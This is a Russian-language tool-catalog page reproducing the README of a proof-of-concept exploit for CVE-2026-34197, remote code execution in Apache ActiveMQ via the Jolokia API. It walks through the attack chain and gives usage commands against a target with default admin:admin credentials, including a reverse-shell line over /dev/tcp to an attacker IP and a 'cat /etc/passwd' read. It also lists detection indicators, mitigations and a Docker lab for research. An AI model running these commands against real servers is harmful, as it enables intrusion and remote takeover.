Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/devsecurityspro/cve-2026-34197
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

# Эксплойт PoC для CVE-2026-34197 Эксплойт класса proof-of-concept для CVE-2026-34197 — RCE в Apache ActiveMQ через Jolokia API. Включает эксплойт на Python, шаблон полезной нагрузки и Docker-лабораторию для тестирования и исследований.

Репозиторий
435 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-34197 — Apache ActiveMQ RCE через Jolokia API

Описание

CVE-2026-34197 — это уязвимость удалённого выполнения кода (RCE) в Apache ActiveMQ Classic, которая позволяет атакующему выполнять произвольные команды в операционной системе сервера через API Jolokia, доступную в веб-консоли.

Уязвимость существует более 13 лет и resides во взаимодействии нескольких компонентов: Jolokia (HTTP-JMX мост), MBeans ActiveMQ, сетевые коннекторы и транспорт VM.

Информация об уязвимости

ПолеДетали
CVE IDCVE-2026-34197
ТипRCE (Remote Code Execution)
CWECWE-20 (Некорректная проверка входных данных), CWE-94 (Инъекция кода)
Затронутые версииActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
Исправленные версии5.19.4, 6.2.3
Требуется аутентификацияДа (часто используются учётные данные по умолчанию admin:admin)
Без аутентификации в6.0.0 — 6.1.1 (из-за CVE-2024-32114)
Порт по умолчанию8161 (веб-консоль)

Механизм эксплуатации

Цепочка атаки работает следующим образом:

  1. Атакующий отправляет POST-запрос на /api/jolokia/, вызывая операцию addNetworkConnector MBean брокера.
  2. Аргумент содержит URI с транспортом vm://, ссылающийся на несуществующий брокер.
  3. ActiveMQ пытается создать этот брокер на лету и принимает параметр brokerConfig, указывающий на удалённый URL.
  4. Схема xbean: указывает, что ресурс является файлом конфигурации Spring XML.
  5. Spring инстанцирует все бины, определённые в XML, включая тот, который выполняет Runtime.getRuntime().exec().
  6. На сервере выполняется произвольная команда.
root@kitploit:~
Атакующий                          ActiveMQ (жертва)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://АТАКУЮЩИЙ/x.xml) |
   |                                    |
   |                                    |-- Создаёт VM-брокер
   |                                    |-- Скачивает x.xml
   |<-- GET /x.xml --------------------|
   |-- Отвечает XML-пейлоадом -------->|
   |                                    |-- Spring инстанцирует бины
   |                                    |-- Runtime.exec(КОМАНДА)
   |                                    |

Структура проекта

root@kitploit:~
CVE-2026-34197/
├── README.md              # Этот файл
├── exploit.py             # Основной PoC
├── payloads/
│   └── template.xml       # Шаблон Spring XML пейлоада
├── docker/
│   └── docker-compose.yml # Уязвимая лабораторная среда
└── LICENSE

Требования

  • Python 3.8+
  • Модули: requests, http.server, argparse (stdlib)
  • Сетевой доступ к порту 8161 цели
  • Docker и Docker Compose (опционально, для лаборатории)
root@kitploit:~
pip install requests

Использование

1. Запуск уязвимой среды (опционально)

root@kitploit:~
cd docker
docker-compose up -d

Это запустит уязвимый ActiveMQ Classic 5.18.6 на localhost:8161.

2. Запуск эксплойта

root@kitploit:~
# Базовое использование с учётными данными по умолчанию
python exploit.py -t http://ЦЕЛЬ:8161 -l IP_АТАКУЮЩЕГО -c "id"

# Указание учётных данных
python exploit.py -t http://ЦЕЛЬ:8161 -l IP_АТАКУЮЩЕГО -c "whoami" -u admin -p admin

# Указание порта HTTP-сервера для пейлоада
python exploit.py -t http://ЦЕЛЬ:8161 -l IP_АТАКУЮЩЕГО -lp 9999 -c "cat /etc/passwd"

# Режим без аутентификации (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://ЦЕЛЬ:8161 -l IP_АТАКУЮЩЕГО -c "id" --no-auth

# Обратная оболочка
python exploit.py -t http://ЦЕЛЬ:8161 -l IP_АТАКУЮЩЕГО -c "bash -i >& /dev/tcp/IP_АТАКУЮЩЕГО/4444 0>&1"

Параметры

ПараметрОписание
-t, --targetБазовый URL цели (например: http://10.0.0.1:8161)
-l, --lhostIP атакующего для раздачи XML-пейлоада
-lp, --lportПорт локального HTTP-сервера (по умолчанию: 8888)
-c, --commandКоманда для выполнения на цели
-u, --userПользователь (по умолчанию: admin)
-p, --passwordПароль (по умолчанию: admin)
--no-authНе отправлять учётные данные (для версий 6.0.0 - 6.1.1)
--broker-nameИмя брокера (по умолчанию: localhost)

Обнаружение

Индикаторы в логах брокера ActiveMQ:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

Другие индикаторы:

  • POST-запросы к /api/jolokia/ с addNetworkConnector в теле
  • Исходящие HTTP-соединения из процесса ActiveMQ к неожиданным хостам
  • Неожиданные дочерние процессы, порождённые Java-процессом ActiveMQ

Устранение

  • Обновиться до ActiveMQ Classic 5.19.4 или 6.2.3
  • Сменить учётные данные веб-консоли по умолчанию
  • Ограничить сетевой доступ к порту 8161
  • Мониторить логи брокера на предмет URI vm:// с brokerConfig=xbean:http

Ссылки

  • NVD — CVE-2026-34197
  • Horizon3 — Технический анализ
  • Apache ActiveMQ — Уведомление о безопасности
  • CVE-2024-32114 — Jolokia без аутентификации
  • CVE-2023-46604 — RCE OpenWire (CISA KEV)

Автор

Создано KONDOR DEV SECURITY

Telegram

Правовое уведомление

Данный PoC предоставляется исключительно в образовательных целях и для исследований в области безопасности. Использование этого инструмента против систем без явного разрешения незаконно. Автор не несёт ответственности за неправомерное использование этого инструмента.

Лицензия

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

Скачать инструмент